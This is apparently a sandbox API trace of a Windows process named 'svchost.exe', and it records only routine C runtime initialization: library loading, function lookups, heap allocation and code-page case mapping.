	[0198.915] GetLastError () returned 0x57
	[0198.915] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x6c330000
	[0198.915] GetProcAddress (hModule=0x6c330000, lpProcName="InitializeCriticalSectionEx") returned 0x0
	[0198.916] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0198.916] GetLastError () returned 0x57
	[0198.916] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0198.916] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0
	[0198.916] GetLastError () returned 0x57
	[0198.916] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76b10000
	[0198.916] GetProcAddress (hModule=0x76b10000, lpProcName="FlsAlloc") returned 0x76b6418d
	[0198.916] GetProcAddress (hModule=0x76b10000, lpProcName="FlsSetValue") returned 0x76b676e6
	[0198.917] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0
	[0198.917] GetLastError () returned 0x57
	[0198.917] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x6c330000
	[0198.917] GetProcAddress (hModule=0x6c330000, lpProcName="InitializeCriticalSectionEx") returned 0x0
	[0198.917] GetProcessHeap () returned 0x370000
	[0198.917] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0198.917] GetLastError () returned 0x57
	[0198.917] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0198.917] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0
	[0198.917] GetLastError () returned 0x57
	[0198.917] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76b10000
	[0198.917] GetProcAddress (hModule=0x76b10000, lpProcName="FlsAlloc") returned 0x76b6418d
	[0198.917] GetLastError () returned 0x57
	[0198.918] GetProcAddress (hModule=0x76b10000, lpProcName="FlsGetValue") returned 0x76b61e16
	[0198.918] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x364) returned 0x396198
	[0198.918] GetProcAddress (hModule=0x76b10000, lpProcName="FlsSetValue") returned 0x76b676e6
	[0198.918] SetLastError (dwErrCode=0x57) 
	[0198.918] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xc00) returned 0x396508
	[0198.919] GetStartupInfoW (in: lpStartupInfo=0x22fa6c | out: lpStartupInfo=0x22fa6c*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4cf800, hStdOutput=0x7cc7d8b, hStdError=0xfffffffe)) 
	[0198.919] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
	[0198.919] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
	[0198.919] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
	[0198.919] GetCommandLineA () returned="svchost.exe"
	[0198.919] GetCommandLineW () returned="svchost.exe"
	[0198.919] GetLastError () returned 0x57
	[0198.919] SetLastError (dwErrCode=0x57) 
	[0198.919] GetLastError () returned 0x57
	[0198.919] SetLastError (dwErrCode=0x57) 
	[0198.919] GetACP () returned 0x4e4
	[0198.919] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x220) returned 0x397910
	[0198.919] IsValidCodePage (CodePage=0x4e4) returned 1
	[0198.919] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x22fa9c | out: lpCPInfo=0x22fa9c) returned 1
	[0198.919] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x22f364 | out: lpCPInfo=0x22f364) returned 1
	[0198.919] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f978, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0198.919] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f978, cbMultiByte=256, lpWideCharStr=0x22f108, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0198.919] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x22f378 | out: lpCharType=0x22f378) returned 1
	[0198.919] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f978, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0198.919] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f978, cbMultiByte=256, lpWideCharStr=0x22f0b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0198.919] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0198.919] GetLastError () returned 0x57
	[0198.919] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0198.920] GetProcAddress (hModule=0x76b10000, lpProcName="LCMapStringEx") returned 0x76b9f72b
	[0198.920] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0198.920] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x22eea8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256
	[0198.920] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x22f878, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xcf\x9e\xa1\x07\xb4\xfa\x22", lpUsedDefaultChar=0x0) returned 256
	[0198.920] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f978, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0198.920] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x22f978, cbMultiByte=256, lpWideCharStr=0x22f0c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0198.920] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0198.920] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x22eeb8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256
	[0198.920] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x22f778, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xcf\x9e\xa1\x07\xb4\xfa\x22", lpUsedDefaultChar=0x0) returned 256
	[0198.920] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x80) returned 0x394868
	[0198.920] RtlInitializeSListHead (in: ListHead=0x4f3e70 | out: ListHead=0x4f3e70) 
	[0198.920] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.920] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeConditionVariable") returned 0x77389981
	[0198.920] GetProcAddress (hModule=0x76b10000, lpProcName="SleepConditionVariableCS") returned 0x76b418be
	[0198.920] GetProcAddress (hModule=0x76b10000, lpProcName="WakeAllConditionVariable") returned 0x773545a5
	[0198.920] RtlInitializeConditionVariable (in: ConditionVariable=0x4f3e28 | out: ConditionVariable=0x4f3e28) 
	[0198.921] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0198.921] GetProcAddress (hModule=0x76b10000, lpProcName="FlsAlloc") returned 0x76b6418d
	[0198.921] GetProcAddress (hModule=0x76b10000, lpProcName="FlsFree") returned 0x76b61f61
	[0198.921] GetProcAddress (hModule=0x76b10000, lpProcName="FlsGetValue") returned 0x76b61e16
	[0198.921] GetProcAddress (hModule=0x76b10000, lpProcName="FlsSetValue") returned 0x76b676e6
	[0198.921] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSectionEx") returned 0x76b63879
	[0198.921] GetProcAddress (hModule=0x76b10000, lpProcName="InitOnceExecuteOnce") returned 0x76b59601
	[0198.921] GetProcAddress (hModule=0x76b10000, lpProcName="CreateEventExW") returned 0x76b124d8
	[0198.921] GetProcAddress (hModule=0x76b10000, lpProcName="CreateSemaphoreW") returned 0x76b4db8b
	[0198.921] GetProcAddress (hModule=0x76b10000, lpProcName="CreateSemaphoreExW") returned 0x76b42111
	[0198.921] GetProcAddress (hModule=0x76b10000, lpProcName="CreateThreadpoolTimer") returned 0x76b4b009
	[0198.921] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadpoolTimer") returned 0x773589be
	[0198.921] GetProcAddress (hModule=0x76b10000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7734c02a
	[0198.921] GetProcAddress (hModule=0x76b10000, lpProcName="CloseThreadpoolTimer") returned 0x7734c0d2
	[0198.922] GetProcAddress (hModule=0x76b10000, lpProcName="CreateThreadpoolWait") returned 0x76b43f78
	[0198.922] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadpoolWait") returned 0x77358bfb
	[0198.922] GetProcAddress (hModule=0x76b10000, lpProcName="CloseThreadpoolWait") returned 0x7734b567
	[0198.922] GetProcAddress (hModule=0x76b10000, lpProcName="FlushProcessWriteBuffers") returned 0x77375998
	[0198.922] GetProcAddress (hModule=0x76b10000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77342251
	[0198.922] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentProcessorNumber") returned 0x773428f6
	[0198.922] GetProcAddress (hModule=0x76b10000, lpProcName="CreateSymbolicLinkW") returned 0x76b99aa9
	[0198.922] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentPackageId") returned 0x0
	[0198.922] GetProcAddress (hModule=0x76b10000, lpProcName="GetTickCount64") returned 0x76b4eb4e
	[0198.922] GetProcAddress (hModule=0x76b10000, lpProcName="GetFileInformationByHandleEx") returned 0x76b538ad
